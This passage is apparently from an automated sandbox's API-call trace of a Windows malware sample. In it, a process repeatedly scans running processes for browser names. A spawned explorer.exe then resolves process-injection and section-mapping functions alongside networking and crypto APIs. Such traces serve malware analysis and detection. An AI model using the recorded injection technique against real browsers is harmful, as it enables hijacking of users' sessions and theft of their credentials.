szExeFile="zoodiffer.exe")) returned 1 [0263.288] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0263.288] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0263.288] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0263.288] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.288] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0263.289] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0263.289] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0263.289] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0263.289] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.289] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0263.289] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0263.289] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0263.289] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0263.289] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.289] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0263.290] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0263.290] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0263.290] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0263.290] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.290] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0263.290] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0263.290] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0263.290] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0263.291] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.291] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0263.291] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0263.291] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0263.291] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0263.291] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.291] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0263.292] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0263.292] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0263.292] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0263.292] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.292] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0263.292] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0263.292] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0263.292] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0263.292] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.292] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0263.293] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0263.293] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0263.293] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0263.293] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.293] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0263.293] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0263.293] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0263.293] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0263.293] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.293] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0263.294] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0263.294] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0263.294] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0263.294] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.294] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.294] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.294] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.295] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.295] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.295] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0263.295] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0263.295] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0263.295] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0263.295] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.295] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0263.296] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0263.296] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0263.296] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0263.296] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.296] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0263.296] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0263.296] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0263.296] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0263.296] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.296] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.297] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0263.297] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0263.297] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0263.297] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.297] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0263.297] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0263.297] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0263.297] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0263.297] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0263.297] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.298] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0263.298] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0263.298] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0263.298] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.298] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.299] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0263.299] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0263.299] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0263.299] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.299] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.299] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0263.299] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0263.299] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0263.299] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.299] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0263.300] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0263.300] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0263.300] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0263.300] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0263.300] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 0 [0263.300] CloseHandle (hObject=0xd4) returned 1 [0263.300] Sleep (dwMilliseconds=0x3e8) Process: id = "16" image_name = "explorer.exe" filename = "c:\\windows\\syswow64\\explorer.exe" page_root = "0x54782000" os_pid = "0x958" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xbdc" cmd_line = "C:\\Windows\\SysWOW64\\explorer.exe" cur_dir = "C:\\Windows\\SysWOW64\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 198 os_tid = 0x94c [0163.333] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="ADVAPI32.dll" | out: DestinationString="ADVAPI32.dll") [0163.333] RtlAnsiStringToUnicodeString (in: DestinationString=0x2cf794, SourceString="ADVAPI32.dll", AllocateDestinationString=1 | out: DestinationString="ADVAPI32.dll") returned 0x0 [0163.333] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ADVAPI32.dll", BaseAddress=0x2cf78c | out: BaseAddress=0x2cf78c*=0x74d40000) returned 0x0 [0163.334] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="CryptHashData" | out: DestinationString="CryptHashData") [0163.334] LdrGetProcedureAddress (in: BaseAddress=0x74d40000, Name="CryptHashData", Ordinal=0x0, ProcedureAddress=0x2cf790 | out: ProcedureAddress=0x2cf790*=0x74d4df36) returned 0x0 [0163.334] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="CRYPT32.dll" | out: DestinationString="CRYPT32.dll") [0163.334] RtlAnsiStringToUnicodeString (in: DestinationString=0x2cf794, SourceString="CRYPT32.dll", AllocateDestinationString=1 | out: DestinationString="CRYPT32.dll") returned 0x0 [0163.334] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="CRYPT32.dll", BaseAddress=0x2cf78c | out: BaseAddress=0x2cf78c*=0x759b0000) returned 0x0 [0163.594] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="CryptStringToBinaryA" | out: DestinationString="CryptStringToBinaryA") [0163.594] LdrGetProcedureAddress (in: BaseAddress=0x759b0000, Name="CryptStringToBinaryA", Ordinal=0x0, ProcedureAddress=0x2cf790 | out: ProcedureAddress=0x2cf790*=0x759e5d77) returned 0x0 [0163.595] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="DNSAPI.dll" | out: DestinationString="DNSAPI.dll") [0163.595] RtlAnsiStringToUnicodeString (in: DestinationString=0x2cf794, SourceString="DNSAPI.dll", AllocateDestinationString=1 | out: DestinationString="DNSAPI.dll") returned 0x0 [0163.595] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="DNSAPI.dll", BaseAddress=0x2cf78c | out: BaseAddress=0x2cf78c*=0x74850000) returned 0x0 [0163.599] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="DnsFree" | out: DestinationString="DnsFree") [0163.599] LdrGetProcedureAddress (in: BaseAddress=0x74850000, Name="DnsFree", Ordinal=0x0, ProcedureAddress=0x2cf790 | out: ProcedureAddress=0x2cf790*=0x7485436b) returned 0x0 [0163.599] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="KERNEL32.DLL" | out: DestinationString="KERNEL32.DLL") [0163.599] RtlAnsiStringToUnicodeString (in: DestinationString=0x2cf794, SourceString="KERNEL32.DLL", AllocateDestinationString=1 | out: DestinationString="KERNEL32.DLL") returned 0x0 [0163.599] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="KERNEL32.DLL", BaseAddress=0x2cf78c | out: BaseAddress=0x2cf78c*=0x76c20000) returned 0x0 [0163.600] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="LoadLibraryA" | out: DestinationString="LoadLibraryA") [0163.600] LdrGetProcedureAddress (in: BaseAddress=0x76c20000, Name="LoadLibraryA", Ordinal=0x0, ProcedureAddress=0x2cf790 | out: ProcedureAddress=0x2cf790*=0x76c349d7) returned 0x0 [0163.600] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="GetProcAddress" | out: DestinationString="GetProcAddress") [0163.600] LdrGetProcedureAddress (in: BaseAddress=0x76c20000, Name="GetProcAddress", Ordinal=0x0, ProcedureAddress=0x2cf790 | out: ProcedureAddress=0x2cf790*=0x76c31222) returned 0x0 [0163.600] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="VirtualProtect" | out: DestinationString="VirtualProtect") [0163.600] LdrGetProcedureAddress (in: BaseAddress=0x76c20000, Name="VirtualProtect", Ordinal=0x0, ProcedureAddress=0x2cf790 | out: ProcedureAddress=0x2cf790*=0x76c3435f) returned 0x0 [0163.600] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="ntdll.dll" | out: DestinationString="ntdll.dll") [0163.600] RtlAnsiStringToUnicodeString (in: DestinationString=0x2cf794, SourceString="ntdll.dll", AllocateDestinationString=1 | out: DestinationString="ntdll.dll") returned 0x0 [0163.600] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="ntdll.dll", BaseAddress=0x2cf78c | out: BaseAddress=0x2cf78c*=0x77130000) returned 0x0 [0163.600] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="NtCreateSection" | out: DestinationString="NtCreateSection") [0163.600] LdrGetProcedureAddress (in: BaseAddress=0x77130000, Name="NtCreateSection", Ordinal=0x0, ProcedureAddress=0x2cf790 | out: ProcedureAddress=0x2cf790*=0x7714ff94) returned 0x0 [0163.600] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="USER32.dll" | out: DestinationString="USER32.dll") [0163.600] RtlAnsiStringToUnicodeString (in: DestinationString=0x2cf794, SourceString="USER32.dll", AllocateDestinationString=1 | out: DestinationString="USER32.dll") returned 0x0 [0163.600] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="USER32.dll", BaseAddress=0x2cf78c | out: BaseAddress=0x2cf78c*=0x74f40000) returned 0x0 [0163.600] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="wsprintfW" | out: DestinationString="wsprintfW") [0163.601] LdrGetProcedureAddress (in: BaseAddress=0x74f40000, Name="wsprintfW", Ordinal=0x0, ProcedureAddress=0x2cf790 | out: ProcedureAddress=0x2cf790*=0x74f7e061) returned 0x0 [0163.601] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="WINHTTP.dll" | out: DestinationString="WINHTTP.dll") [0163.601] RtlAnsiStringToUnicodeString (in: DestinationString=0x2cf794, SourceString="WINHTTP.dll", AllocateDestinationString=1 | out: DestinationString="WINHTTP.dll") returned 0x0 [0163.601] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WINHTTP.dll", BaseAddress=0x2cf78c | out: BaseAddress=0x2cf78c*=0x747f0000) returned 0x0 [0163.603] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="WinHttpOpen" | out: DestinationString="WinHttpOpen") [0163.603] LdrGetProcedureAddress (in: BaseAddress=0x747f0000, Name="WinHttpOpen", Ordinal=0x0, ProcedureAddress=0x2cf790 | out: ProcedureAddress=0x2cf790*=0x747f58b9) returned 0x0 [0163.603] RtlInitAnsiString (in: DestinationString=0x2cf79c, SourceString="WS2_32.dll" | out: DestinationString="WS2_32.dll") [0163.604] RtlAnsiStringToUnicodeString (in: DestinationString=0x2cf794, SourceString="WS2_32.dll", AllocateDestinationString=1 | out: DestinationString="WS2_32.dll") returned 0x0 [0163.604] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="WS2_32.dll", BaseAddress=0x2cf78c | out: BaseAddress=0x2cf78c*=0x75bc0000) returned 0x0 [0163.604] LdrGetProcedureAddress (in: BaseAddress=0x75bc0000, Name=0x0, Ordinal=0xf, ProcedureAddress=0x2cf790 | out: ProcedureAddress=0x2cf790*=0x75bc2d8b) returned 0x0 [0163.604] LdrProcessRelocationBlock (Address=0x77000, Count=0x2, TypeOffset=0x781ec, Delta=0xf0070000) returned 0x781f0 [0163.605] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76c20000 [0163.605] GetProcAddress (hModule=0x76c20000, lpProcName="Sleep") returned 0x76c310ff [0163.605] GetProcAddress (hModule=0x76c20000, lpProcName="ReadProcessMemory") returned 0x76c4cfcc [0163.605] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32Next") returned 0x76cb5c3f [0163.606] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcatA") returned 0x76c52b7a [0163.606] GetProcAddress (hModule=0x76c20000, lpProcName="ExitThread") returned 0x7718d598 [0163.606] GetProcAddress (hModule=0x76c20000, lpProcName="MultiByteToWideChar") returned 0x76c3192e [0163.606] GetProcAddress (hModule=0x76c20000, lpProcName="RtlMoveMemory") returned 0x77193c40 [0163.606] GetProcAddress (hModule=0x76c20000, lpProcName="GetLastError") returned 0x76c311c0 [0163.606] GetProcAddress (hModule=0x76c20000, lpProcName="lstrcmpiA") returned 0x76c33e8e [0163.606] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcAddress") returned 0x76c31222 [0163.606] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualAlloc") returned 0x76c31856 [0163.606] GetProcAddress (hModule=0x76c20000, lpProcName="LoadLibraryA") returned 0x76c349d7 [0163.606] GetProcAddress (hModule=0x76c20000, lpProcName="OpenThread") returned 0x76c41248 [0163.607] GetProcAddress (hModule=0x76c20000, lpProcName="Process32Next") returned 0x76c588a4 [0163.607] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleFileNameA") returned 0x76c314b1 [0163.607] GetProcAddress (hModule=0x76c20000, lpProcName="GetModuleHandleA") returned 0x76c31245 [0163.607] GetProcAddress (hModule=0x76c20000, lpProcName="CreateMutexA") returned 0x76c34c6b [0163.607] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualProtect") returned 0x76c3435f [0163.607] GetProcAddress (hModule=0x76c20000, lpProcName="CreateToolhelp32Snapshot") returned 0x76c5735f [0163.607] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentThreadId") returned 0x76c31450 [0163.607] GetProcAddress (hModule=0x76c20000, lpProcName="CloseHandle") returned 0x76c31410 [0163.607] GetProcAddress (hModule=0x76c20000, lpProcName="GetCurrentProcessId") returned 0x76c311f8 [0163.607] GetProcAddress (hModule=0x76c20000, lpProcName="WriteProcessMemory") returned 0x76c4d9e0 [0163.607] GetProcAddress (hModule=0x76c20000, lpProcName="SuspendThread") returned 0x76c57d7e [0163.607] GetProcAddress (hModule=0x76c20000, lpProcName="ResumeThread") returned 0x76c343ef [0163.608] GetProcAddress (hModule=0x76c20000, lpProcName="RtlZeroMemory") returned 0x77193c10 [0163.608] GetProcAddress (hModule=0x76c20000, lpProcName="Thread32First") returned 0x76cb5b93 [0163.608] GetProcAddress (hModule=0x76c20000, lpProcName="CreateRemoteThread") returned 0x76cb416b [0163.608] GetProcAddress (hModule=0x76c20000, lpProcName="OpenProcess") returned 0x76c31986 [0163.608] GetProcAddress (hModule=0x76c20000, lpProcName="GetProcessHeap") returned 0x76c314e9 [0163.608] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualFree") returned 0x76c3186e [0163.608] GetProcAddress (hModule=0x76c20000, lpProcName="Process32First") returned 0x76c58ae7 [0163.608] GetProcAddress (hModule=0x76c20000, lpProcName="HeapFree") returned 0x76c314c9 [0163.608] GetProcAddress (hModule=0x76c20000, lpProcName="HeapAlloc") returned 0x7715e026 [0163.609] GetProcAddress (hModule=0x76c20000, lpProcName="VirtualQuery") returned 0x76c3445a [0163.609] GetProcAddress (hModule=0x76c20000, lpProcName="lstrlenA") returned 0x76c35a4b [0163.609] GetProcAddress (hModule=0x76c20000, lpProcName="IsWow64Process") returned 0x76c3195e [0163.609] GetProcAddress (hModule=0x76c20000, lpProcName="HeapReAlloc") returned 0x77171f6e [0163.609] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x74d40000 [0163.609] GetProcAddress (hModule=0x74d40000, lpProcName="CryptDestroyHash") returned 0x74d4df66 [0163.609] GetProcAddress (hModule=0x74d40000, lpProcName="CryptReleaseContext") returned 0x74d4e124 [0163.609] GetProcAddress (hModule=0x74d40000, lpProcName="CryptHashData") returned 0x74d4df36 [0163.609] GetProcAddress (hModule=0x74d40000, lpProcName="CryptGetHashParam") returned 0x74d4df7e [0163.609] GetProcAddress (hModule=0x74d40000, lpProcName="CryptCreateHash") returned 0x74d4df4e [0163.609] GetProcAddress (hModule=0x74d40000, lpProcName="CryptAcquireContextA") returned 0x74d491dd [0163.610] LoadLibraryA (lpLibFileName="CRYPT32.dll") returned 0x759b0000 [0163.610] GetProcAddress (hModule=0x759b0000, lpProcName="CryptStringToBinaryA") returned 0x759e5d77 [0163.610] GetProcAddress (hModule=0x759b0000, lpProcName="CryptBinaryToStringA") returned 0x759ea8c5 [0163.610] LoadLibraryA (lpLibFileName="DNSAPI.dll") returned 0x74850000 [0163.610] GetProcAddress (hModule=0x74850000, lpProcName="DnsFree") returned 0x7485436b [0163.610] GetProcAddress (hModule=0x74850000, lpProcName="DnsQuery_W") returned 0x7486572c [0163.610] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77130000 [0163.610] GetProcAddress (hModule=0x77130000, lpProcName="NtCreateSection") returned 0x7714ff94 [0163.610] GetProcAddress (hModule=0x77130000, lpProcName="NtSetInformationProcess") returned 0x7714fb18 [0163.611] GetProcAddress (hModule=0x77130000, lpProcName="NtMapViewOfSection") returned 0x7714fc40 [0163.611] GetProcAddress (hModule=0x77130000, lpProcName="LdrProcessRelocationBlock") returned 0x771de9cf [0163.611] GetProcAddress (hModule=0x77130000, lpProcName="NtUnmapViewOfSection") returned 0x7714fc70 [0163.611] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x74f40000 [0163.611] GetProcAddress 